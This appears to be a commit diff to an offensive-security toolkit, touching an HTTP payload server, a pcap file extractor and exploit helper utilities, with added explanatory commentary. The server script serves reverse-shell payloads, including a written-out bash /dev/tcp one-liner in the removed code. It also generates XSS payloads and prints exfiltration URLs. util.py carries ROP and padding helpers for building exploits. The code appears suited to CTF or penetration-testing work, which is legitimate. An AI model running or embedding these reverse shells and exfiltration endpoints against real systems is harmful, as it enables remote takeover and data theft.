pcap file extract, some bugfixes
This commit is contained in:
parent 1a604ca2f3
commit 0ebf221c9c
@@ -1,5 +1,6 @@
 #!/usr/bin/env python
 
+import argparse
 from http.server import BaseHTTPRequestHandler, HTTPServer
 from urllib.parse import urlparse
 import threading
@@ -245,10 +246,10 @@ class HttpFileServer(HTTPServer):
         protocol = "https" if type(self.socket) == ssl.SSLSocket else "http"
         return f"{protocol}://{addr}{port}"
 
-    def get_full_url(self, uri):
+    def get_full_url(self, uri, ip_addr=None):
         if not uri.startswith("/"):
             uri = "/" + uri
-        return self.get_base_url() + uri
+        return self.get_base_url(ip_addr) + uri
 
     def stop(self):
         self.is_running = False
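The call `self.get_base_url(ip_addr)` implies `get_base_url` now accepts an optional address override, though that change sits outside this hunk. A minimal sketch of a compatible implementation, inferred from the visible f-string; the `addr`/`port` derivation is an assumption:

```python
# Hypothetical sketch, not the committed code. Assumes get_base_url()
# derives addr/port from the bound socket unless an override is given.
def get_base_url(self, ip_addr=None):
    protocol = "https" if type(self.socket) == ssl.SSLSocket else "http"
    addr, port = self.server_address[0:2]
    if ip_addr is not None:
        addr = ip_addr  # e.g. the external address from util.get_address()
    # omit the port for the protocol defaults, matching the f-string above
    port = "" if (protocol, port) in [("http", 80), ("https", 443)] else f":{port}"
    return f"{protocol}://{addr}{port}"
```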
@@ -262,27 +263,57 @@ if __name__ == "__main__":
-        print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0])
-        exit(1)
-
-    httpPort = 80
-    fileServer = HttpFileServer("0.0.0.0", httpPort)
-    ipAddress = util.get_address()
-
-    if sys.argv[1] == "shell":
-        listenPort = 4444 if len(sys.argv) < 3 else int(sys.argv[2])
-        rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
-        fileServer.addFile("shell.sh", rev_shell)
-        fileServer.dumpRequest("/")
-        print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
-    elif sys.argv[1] == "dump":
-        fileServer.dumpRequest("/")
-        print("Exfiltrate data using: http://%s/" % ipAddress)
-    elif sys.argv[1] == "proxy":
-        url = "https://google.com" if len(sys.argv) < 3 else sys.argv[2]
-        fileServer.forwardRequest("/proxy", url)
-        print("Exfiltrate data using: http://%s/proxy" % ipAddress)
-    elif sys.argv[1] == "xss":
-        type = "img" if len(sys.argv) < 3 else sys.argv[2]
-        xss = xss_handler.generatePayload(type, ipAddress, httpPort)
+    parser = argparse.ArgumentParser(description="Spawn a temporary http server")
+    parser.add_argument(
+        "action",
+        choices=["shell", "dump", "proxy", "xss"],
+        help="Choose one of these actions: shell, dump, proxy, xss"
+    )
+
+    parser.add_argument(
+        "--bind-address",
+        type=str,
+        default="0.0.0.0",
+        dest="bind_addr",
+        help="Address to bind on (default: 0.0.0.0)"
+    )
+
+    # Optional argument: port
+    parser.add_argument(
+        "--port",
+        type=int,
+        default=9000,
+        help="Port to bind on (default: 9000)"
+    )
+
+    parser.add_argument(
+        "--payload",
+        type=str,
+        default=None,
+        help="Payload for xss / shell"
+    )
+
+    args = parser.parse_args()
+
+    file_server = HttpFileServer(args.bind_addr, args.port)
+    ip_address = util.get_address()
+
+    if args.action == "shell":
+        payload_type = args.payload if args.payload else "bash"
+        shell_payload = rev_shell.generate_payload(payload_type, ip_address, 4444)
+        file_server.addFile("/shell", shell_payload)
+        print("Reverse Shell URL:", file_server.get_full_url("/shell", ip_address))
+    elif args.action == "dump":
+        file_server.dumpRequest("/")
+        print("Exfiltrate data using:", file_server.get_full_url("/", ip_address))
+    elif args.action == "proxy":
+        url = "https://google.com"
+        file_server.forwardRequest("/proxy", url)
+        print("Exfiltrate data using:", file_server.get_full_url("/proxy", ip_address))
+    elif args.action == "xss":
+        payload_type = args.payload if args.payload else "img"
+        xss = xss_handler.generatePayload(payload_type, ip_address, args.port)
+        print("Exfiltrate data using:")
+        print(xss)
 
-    fileServer.serve_forever()
+    file_server.serve_forever()
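The rewritten entry point drops positional `sys.argv` parsing for argparse and now calls into a `rev_shell` module instead of building the bash one-liner inline. Only the call `rev_shell.generate_payload(payload_type, ip_address, port)` is visible in the diff; a hedged sketch of an interface that would satisfy it, with everything beyond the function name assumed:

```python
# rev_shell.py -- hypothetical sketch matching the call site above,
# not the committed module.
def generate_payload(payload_type, addr, port):
    payloads = {
        # the bash one-liner the old code inlined
        "bash": f"bash -i >& /dev/tcp/{addr}/{port} 0>&1",
        # an assumed alternative type for illustration
        "nc": f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {addr} {port} >/tmp/f",
    }
    return payloads[payload_type]

# Example invocation of the new CLI (script name assumed):
#   ./http-server.py shell --port 9000 --payload bash
```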

pcap-file-extract.py (Normal file → Executable file, 38 lines changed)
@@ -1,3 +1,5 @@
 #!/bin/python
+
+import argparse
 import os
 import re
@@ -191,7 +193,16 @@ class PcapExtractor:
         self._packets = rdpcap(self.pcap_path)
 
     def extract_all(self):
-        pass
+        self._open_file()
+        http_packets = self._parse_http_packets()
+        filtered_packets = self._apply_filters(http_packets)
+        for packet in filtered_packets:
+            if len(packet.payload) > 0:
+                file_path = packet.get_file_path()
+                with open(os.path.join(self.output_dir, file_path.replace("/", "_")), "wb") as f:
+                    f.write(packet.payload)
+
+                print(f"[+] Extracted: {file_path} {util.human_readable_size(len(packet.payload))} Bytes")
 
     def _apply_filters(self, packets):
         filtered_packets = packets
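Note that `extract_all` flattens each recovered path with `file_path.replace("/", "_")`, which both avoids having to create subdirectories and keeps hostile `../` paths from escaping `output_dir`. A standalone illustration with an invented path:

```python
import os

output_dir = "extracted_files/"
file_path = "../../etc/passwd"  # hypothetical hostile path from a capture

# "/" -> "_" turns the whole path into a single plain file name:
print(os.path.join(output_dir, file_path.replace("/", "_")))
# extracted_files/.._.._etc_passwd
```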
@@ -207,12 +218,31 @@ class PcapExtractor:
             print(packet)
 
     def get_http_packet(self, packet_iterator, sock_src, initial_packet):
-        http_buffer = bytes(initial_packet[TCP].payload)
+        http_buffer = raw(initial_packet[TCP].payload)
         prev_seq = initial_packet[TCP].seq
+        buff = None
         while packet_iterator.has_more():
             next_packet = packet_iterator.peek()
             if sock_src == f"{next_packet[IP].src}:{next_packet[TCP].sport}":
                 next_packet = packet_iterator.pop()
-                http_buffer += bytes(next_packet[TCP].payload)
+
+                if buff is not None:
+                    # if there is a buffered packet, and the seq. number was not reused
+                    if buff[0] != next_packet[TCP].seq:
+                        # append it to the output
+                        http_buffer += buff[1]
+                    buff = None
+
+                payload_len = len(next_packet[TCP].payload)
+                if next_packet[TCP].seq - prev_seq != payload_len and payload_len == 1:
+                    # potential TCP ZeroWindowProbe
+                    buff = (next_packet[TCP].seq, raw(next_packet[TCP].payload))
+                    continue
+
+                assert next_packet[TCP].seq > prev_seq
+                assert next_packet[IP].frag == 0
+                http_buffer += raw(next_packet[TCP].payload)
+                prev_seq = next_packet[TCP].seq
             else:
                 break
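The buffering added here guards against TCP ZeroWindowProbes: a probe is a 1-byte segment that reuses an already-seen sequence number, so its byte must not be appended immediately. The code parks such a segment in `buff` and only commits it when a later segment arrives with a *different* sequence number (the byte was real data); if the sequence number is reused, the byte is dropped, because it will arrive again as the first byte of the real segment. The trigger condition, restated as a standalone function with the same arithmetic:

```python
# Illustrative restatement of the committed check, not library code.
def looks_like_zero_window_probe(seq, prev_seq, payload_len):
    # In-order data advances the sequence number consistently with the
    # payload length; a lone 1-byte segment that breaks that arithmetic
    # is buffered instead of appended, in case it is only a window probe.
    return seq - prev_seq != payload_len and payload_len == 1
```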
@@ -268,7 +298,7 @@ if __name__ == "__main__":
     parser.add_argument("-o", "--output-dir", help="Path to destination directory", default="extracted_files/",
                         dest="output_dir")
     parser.add_argument("-l", "--list", help="List available files only", default=False, action="store_true")
-    parser.add_argument("-e", "--extract", help="Extract files (default)", default=None, action="store_true")
+    parser.add_argument("-e", "--extract", help="Extract files (default)", default=True, action="store_true")
     parser.add_argument("-ec", "--exclude-codes", help="Exclude http status codes, default: 101,304,403,404",
                         default="101,304,403,404", dest="exclude_codes")
     parser.add_argument("-ic", "--include-codes", help="Limit http status codes", type=str,
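With `action="store_true"` and `default=True`, passing `-e` can only re-confirm the default, so `--list` is presumably what switches the mode off. If the two modes are meant to be exclusive, argparse can encode that directly; an alternative sketch, not the committed code:

```python
# Alternative sketch: make list/extract mutually exclusive so that
# "--list --extract" is rejected by argparse instead of being ambiguous.
import argparse

parser = argparse.ArgumentParser(description="Extract files from a pcap")
group = parser.add_mutually_exclusive_group()
group.add_argument("-l", "--list", help="List available files only",
                   default=False, action="store_true")
group.add_argument("-e", "--extract", help="Extract files (default)",
                   default=True, action="store_true")

args = parser.parse_args(["--list"])  # example invocation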

util.py (23 lines changed)
@@ -106,6 +106,16 @@ def assert_not_empty(res, err=None):
     err = f"[-] '{res.url}' did not return any data" if err is None else err
     exit_with_error(res, err)
 
+def assert_content_contains(res, data, err=None):
+    assert_not_empty(res)
+    if isinstance(data, str) and data in res.text:
+        return True
+    elif isinstance(data, bytes) and data in res.content:
+        return True
+
+    err = f"[-] '{res.url}' did not include '{data}' in response" if err is None else err
+    exit_with_error(res, err)
+
 def assert_json_path(res, path, value, err=None):
     assert_content_type(res, "application/json")
     assert_not_empty(res)
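The new helper accepts either `str` (matched against `res.text`) or `bytes` (matched against `res.content`) and falls through to `exit_with_error` on a miss. Typical use from an exploit script might look like this; the target URL and expected strings are invented for the example:

```python
import requests
import util

res = requests.get("http://target.local/admin")  # hypothetical target
util.assert_content_contains(res, "flag{")       # str  -> checked in res.text
util.assert_content_contains(res, b"\x7fELF")    # bytes -> checked in res.content
```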
@@ -197,9 +207,18 @@ def genSyscall(elf, syscall, registers):
     rop.raw(rop.find_gadget([syscall_gadget]).address)
     return rop
 
-def pad(x, n, b=b"\x00"):
+def lpad(x, n, b=b"\x00"):
+    return pad(x, n, b, "l")
+
+def rpad(x, n, b=b"\x00"):
+    return pad(x, n, b, "r")
+
+def pad(x, n, b=b"\x00", s="r"):
     if len(x) % n != 0:
-        x += (n-(len(x)%n))*b
+        if s == "r":
+            x += (n-(len(x)%n))*b
+        elif s == "l":
+            x = (n-(len(x)%n))*b + x
     return x
 
 def xor(a, b):
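The padding helpers now share one implementation: `pad` fills to the next multiple of `n` on side `s`, and `lpad`/`rpad` are thin wrappers. Behavior per the code above, assuming this `util.py` is importable (inputs already a multiple of `n` pass through untouched):

```python
from util import pad, lpad, rpad  # util.py from this repo

assert rpad(b"ABC", 4) == b"ABC\x00"        # fill on the right
assert lpad(b"ABC", 4) == b"\x00ABC"        # fill on the left
assert lpad(b"AB", 8, b"A") == b"AAAAAAAB"  # custom fill byte
assert pad(b"ABCD", 4) == b"ABCD"           # already aligned: unchanged
```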